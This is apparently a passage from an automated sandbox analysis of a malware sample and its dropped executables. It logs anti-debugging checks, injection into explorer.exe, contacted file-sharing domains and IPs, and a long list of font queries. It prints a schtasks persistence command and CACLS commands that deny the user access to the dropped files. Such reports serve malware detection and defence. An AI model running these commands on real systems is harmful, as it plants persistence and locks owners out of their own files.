Source: explorer.exe, 00000001.00000000.268150231.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: 816F.exe, 0000001A.00000002.552068120.00000000008B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00930D90 mov eax, dword ptr fs:[00000030h] 11_2_00930D90
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0093092B mov eax, dword ptr fs:[00000030h] 11_2_0093092B
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00B483B3 push dword ptr fs:[00000030h] 11_2_00B483B3
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0040ADB0 GetProcessHeap,HeapFree, 12_2_0040ADB0
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_02520490 LdrInitializeThunk, 12_2_02520490
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004123F1 SetUnhandledExceptionFilter, 12_2_004123F1

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: cdn-102.anonfiles.com
Source: C:\Windows\explorer.exe Domain query: bitbucket.org
Source: C:\Windows\explorer.exe Domain query: bbuseruploads.s3.amazonaws.com
Source: C:\Windows\explorer.exe Domain query: u.to
Source: C:\Windows\explorer.exe Domain query: github.com
Source: C:\Windows\explorer.exe Domain query: raw.githubusercontent.com
Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe Domain query: o36fafs3sn6xou.com
Source: C:\Windows\explorer.exe Domain query: anonfiles.com
Source: C:\Windows\explorer.exe Domain query: hoteldostyk.com
Source: C:\Windows\explorer.exe Domain query: iplogger.com
Source: C:\Windows\explorer.exe Network Connect: 89.208.107.216 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: srshf.com
Source: C:\Windows\explorer.exe Domain query: transfer.sh
Source: C:\Windows\explorer.exe Domain query: 1ecosolution.it
Source: C:\Windows\explorer.exe Network Connect: 193.56.146.168 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: cdn-104.anonfiles.com
Source: C:\Windows\explorer.exe File created: 6644.exe.1.dr Jump to dropped file
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 700000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 700000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Memory written: C:\Users\user\AppData\Local\Temp\86EE.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\8C00.exe Memory written: C:\Users\user\AppData\Local\Temp\8C00.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Thread created: C:\Windows\explorer.exe EIP: 3321A28 Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Thread created: unknown EIP: 5851A28 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 700000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 44B008 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5612 base: CDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5928 base: 7FF69FF38150 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 1768 base: CDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5080 base: 7FF69FF38150 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 3780 base: CDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 1648 base: CDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 812 base: CDF380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 6120 base: 7FF69FF38150 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5508 base: CDF380 value: 90 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3790.exe Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe Process created: unknown unknown
Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286813031.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258274130.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.319633888.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.324125536.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286813031.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258274130.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.307075879.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.286195559.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.257831649.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286813031.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258274130.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: GetLocaleInfoA, 12_2_00417A20
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Queries volume information: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Users\user\AppData\Local\Temp\816F.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
